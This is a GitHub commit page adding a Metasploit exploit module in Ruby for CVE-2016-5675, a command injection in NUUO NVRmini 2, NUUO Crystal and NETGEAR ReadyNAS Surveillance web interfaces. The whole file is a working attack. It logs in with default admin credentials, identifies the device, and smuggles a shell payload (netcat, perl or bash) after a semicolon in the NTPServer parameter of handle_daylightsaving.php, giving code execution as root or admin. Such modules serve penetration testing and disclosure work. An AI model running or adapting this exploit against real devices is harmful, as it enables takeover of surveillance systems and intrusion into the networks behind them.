Skip to content

Commit 0deac80

Browse files
author
Pedro Ribeiro
committed
add exploit for CVE 2016-5675
1 parent cf95c9f commit 0deac80

File tree

1 file changed

+178
-0
lines changed

1 file changed

+178
-0
lines changed

modules/exploits/linux/http/nuuo_nvrmini_auth_rce.rb

Lines changed: 178 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,178 @@
1+
##
2+
# This module requires Metasploit: http://metasploit.com/download
3+
# Current source: https://github.com/rapid7/metasploit-framework
4+
##
5+
6+
# - test v_web_login_login_type string in NVRmini
7+
8+
require 'msf/core'
9+
10+
class MetasploitModule < Msf::Exploit::Remote
11+
Rank = ExcellentRanking
12+
13+
include Msf::Exploit::Remote::HttpClient
14+
15+
def initialize(info = {})
16+
super(update_info(info,
17+
'Name' => 'NUUO NVRmini 2 / Crystal / NETGEAR ReadyNAS Surveillance Authenticated Remote Code Execution',
18+
'Description' => %q{
19+
The NVRmini 2 Network Video Recorder, Crystal NVR and the ReadyNAS Surveillance application are vulnerable
20+
to an authenticated remote code execution on the exposed web administration interface. An administrative
21+
account is needed to exploit this vulnerability.
22+
This results in code execution as root in the NVRmini and the 'admin' user in ReadyNAS.
23+
This exploit has been tested on several versions of the NVRmini 2, Crystal and the ReadyNAS Surveillance.
24+
It probably also works on the NVRsolo and other Nuuo devices, but it has not been tested
25+
in those devices.
26+
},
27+
'Author' =>
28+
[
29+
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
30+
],
31+
'License' => MSF_LICENSE,
32+
'References' =>
33+
[
34+
['CVE', '2016-5675'],
35+
['US-CERT-VU', '856152'],
36+
['URL', 'TODO_GITHUB_URL'],
37+
['URL', 'TODO_FULLDISC_URL']
38+
],
39+
'DefaultOptions' => { 'WfsDelay' => 5 },
40+
'Platform' => 'unix',
41+
'Arch' => ARCH_CMD,
42+
'Privileged' => false, # Runs as root in NVRmini 2 / Crystal, admin in ReadyNas
43+
'Targets' =>
44+
[
45+
[ 'Automatic', { } ],
46+
[ 'NUUO NVRmini 2', {
47+
'Payload' =>
48+
{
49+
'Space' => 1024, # Actually it might be the GET request length, but this is a safe value
50+
'DisableNops' => true,
51+
'Compat' =>
52+
{
53+
'PayloadType' => 'cmd',
54+
'RequiredCmd' => 'netcat generic perl'
55+
}
56+
},
57+
}],
58+
[ 'ReadyNAS NETGEAR Surveillance', {
59+
'Payload' =>
60+
{
61+
'Space' => 1024, # Actually it might be the GET request length, but this is a safe value
62+
'DisableNops' => true,
63+
'Compat' =>
64+
{
65+
'PayloadType' => 'cmd',
66+
'RequiredCmd' => 'netcat generic perl'
67+
}
68+
},
69+
}],
70+
[ 'NUUO Crystal', {
71+
'Payload' =>
72+
{
73+
'Space' => 1024, # Actually it might be the GET request length, but this is a safe value
74+
'DisableNops' => true,
75+
'Compat' =>
76+
{
77+
'PayloadType' => 'cmd',
78+
'RequiredCmd' => 'bash'
79+
}
80+
},
81+
}],
82+
],
83+
'DefaultTarget' => 0,
84+
'DisclosureDate' => 'Aug 4 2016'))
85+
86+
register_options(
87+
[
88+
Opt::RPORT(8081),
89+
OptString.new('TARGETURI', [true, "Application path", '/']),
90+
OptString.new('USERNAME', [true, 'The username to login as', 'admin']),
91+
OptString.new('PASSWORD', [true, 'Password for the specified username', 'admin']),
92+
], self.class)
93+
end
94+
95+
96+
def id_target
97+
return target if target.name != 'Automatic'
98+
res = send_request_cgi({
99+
'uri' => normalize_uri(datastore['TARGETURI'])
100+
})
101+
if res && res.code == 200
102+
if res.body.to_s =~ /var VENDOR_NAME = "Netgear";/
103+
print_status("#{peer} - Identified NETGEAR ReadyNAS Surveillance as the target.")
104+
return targets[2]
105+
elsif res.body.to_s =~ /v_web_login_login_type/
106+
print_status("#{peer} - Identified NUUO Crystal as the target.")
107+
return targets[3]
108+
else
109+
print_status("#{peer} - Identified NUUO NVRMini 2 as the target.")
110+
return targets[1]
111+
end
112+
end
113+
end
114+
115+
116+
def exploit
117+
res = send_request_cgi({
118+
'method' => 'POST',
119+
'uri' => normalize_uri(datastore['TARGETURI'], "login.php"),
120+
'vars_post' => {
121+
'user' => datastore['USERNAME'],
122+
'pass' => datastore['PASSWORD'],
123+
'submit' => "Login"
124+
}
125+
})
126+
127+
if res && (res.code == 200 || res.code == 302)
128+
cookie = res.get_cookies
129+
else
130+
fail_with(Failure::Unknown, "#{peer} - Failed to log in with the provided credentials.")
131+
end
132+
133+
my_target = id_target
134+
if my_target == targets[1]
135+
if payload.raw.include?("perl")
136+
fail_with(Failure::Unknown, "The NVRmini 2 only supports generic or netcat payloads.")
137+
end
138+
print_status("#{peer} - Executing payload...")
139+
send_request_cgi({
140+
'uri' => normalize_uri(datastore['TARGETURI'], "handle_daylightsaving.php"),
141+
'cookie' => cookie,
142+
'vars_get' => {
143+
'act' => "update",
144+
'NTPServer' => rand_text_alpha(12 + rand(8)) + ";" + payload.encoded
145+
}
146+
}, 1)
147+
elsif my_target == targets[2]
148+
if payload.raw.include?("netcat")
149+
fail_with(Failure::Unknown, "ReadyNAS Surveillance does not support netcat payloads.")
150+
end
151+
# We also have to fix the perl payload - there's an IO import error on the ReadyNAS that blows
152+
# it up.
153+
print_status("#{peer} - Executing payload...")
154+
send_request_cgi({
155+
'uri' => normalize_uri(datastore['TARGETURI'], "handle_daylightsaving.php"),
156+
'cookie' => cookie,
157+
'vars_get' => {
158+
'act' => "update",
159+
'NTPServer' => rand_text_alpha(12 + rand(8)) + ";" + payload.raw.gsub("-MIO ", "-MIO::Socket ")
160+
}
161+
}, 1)
162+
else
163+
if not payload.raw.include?("exec")
164+
fail_with(Failure::Unknown, "NUUO Crystal only supports bash payloads.")
165+
end
166+
print_status("#{peer} - Executing payload...")
167+
send_request_cgi({
168+
'uri' => normalize_uri(datastore['TARGETURI'], "handle_daylightsaving.php"),
169+
'cookie' => cookie,
170+
'vars_get' => {
171+
'act' => "update",
172+
'NTPServer' => rand_text_alpha(12 + rand(8)) + ";" + payload.raw
173+
}
174+
}, 1)
175+
end
176+
handler
177+
end
178+
end

0 commit comments

Comments
 (0)